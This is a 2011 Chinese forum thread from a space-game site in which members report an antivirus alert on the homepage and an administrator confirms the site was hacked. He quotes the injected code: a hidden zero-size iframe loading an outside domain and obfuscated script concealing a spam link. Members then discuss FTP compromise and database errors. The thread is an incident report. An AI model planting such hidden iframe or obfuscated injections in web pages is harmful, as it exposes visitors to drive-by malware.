找回密码
 注册
X系列官方授权正版
搜索
查看: 1529|回复: 8

[讨论] 木马???

[复制链接]
发表于 2011-2-8 17:49:20 | 显示全部楼层 |阅读模式
本帖最后由 FreemanGL 于 2011-2-9 11:07 编辑

FM留言:问题已经处理

怎么搞的?我进首页就报警,有木马?
Settings\Temp\Temporary Internet Files\Content.IE5\298SF81C\bbs_deeptimes_org[1].htm”中检测到病毒或
恶意程序“HEUR/HTML.Malware [heuristic]”。
执行的操作:将文件移到隔离区
发表于 2011-2-8 18:18:36 | 显示全部楼层
目前我这边ESS没报警,不过首页有了奇怪的背景音乐。
弗里曼弗里曼弗里曼弗里曼速速显灵啊。。。。。
回复

使用道具 举报

发表于 2011-2-8 21:54:39 | 显示全部楼层
本帖最后由 FreemanGL 于 2011-2-8 22:20 编辑

的确被挂马了。
挂马内容为
  1. <iframe src=http://www.52sswl.com width=0 height=0></iframe>

  2. <script>document.write ('<d' + 'iv st' + 'yle' + '="po' + 'si' + 'tio' + 'n:a' + 'bso' + 'lu' + 'te;l' + 'ef' + 't:' + '-' + '10' + '00' + '0' + 'p' + 'x;' + '"' + '>');</script>
  3. <a href="/admin/newss.php?id=1846">25931</a>
  4. <script>document.write ('<' + '/d' + 'i' + 'v>');</script>
复制代码
FTP密码又被改乐,要找猪大了。
回复

使用道具 举报

发表于 2011-2-8 23:33:49 | 显示全部楼层
全论坛就只有猪大能登陆后台?
回复

使用道具 举报

发表于 2011-2-9 09:56:19 | 显示全部楼层
本帖最后由 FreemanGL 于 2011-2-9 10:04 编辑
全论坛就只有猪大能登陆后台?
黑暗枪骑兵 发表于 2011-2-8 23:33

不是,目前只有猪大能操作服务器。

被挂马的文件仅有index.php严重怀疑是服务器操作人员。或者是服务器漏洞,FTP漏洞等等。

还有论坛经常性出现
  1. Discuz! info: Can not connect to MySQL server

  2. Time: 2011-2-8 9:59pm
  3. Script: /viewthread.php
  4. Error: Can't connect to MySQL server on 'localhost' (10060)
  5. Errno.: 2003
复制代码
解决方案参考着2个帖子,也需要服务器操作权限。
http://www.liehuo.net/a/view/8991.html
http://blog.9420.org/article.asp?id=2

评分

参与人数 1好评 +1 收起 理由
baiseniao + 1 V5~

查看全部评分

回复

使用道具 举报

发表于 2011-2-9 10:44:28 | 显示全部楼层
ftp漏洞最可疑~~上次被黑就是~
回复

使用道具 举报

发表于 2011-2-9 10:47:09 | 显示全部楼层
恩,看来免费的ftp就是不给力亚~
回复

使用道具 举报

发表于 2011-2-9 10:51:39 | 显示全部楼层
叫人处理乐,暂时把ftp干脆的卸掉~

评分

参与人数 1好评 +1 收起 理由
baiseniao + 1 V6~

查看全部评分

回复

使用道具 举报

发表于 2011-2-9 11:09:18 | 显示全部楼层
FM猪大V5,果然听不见歌了~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

Archiver|手机版|小黑屋|DeepTimes.NET 太空游戏站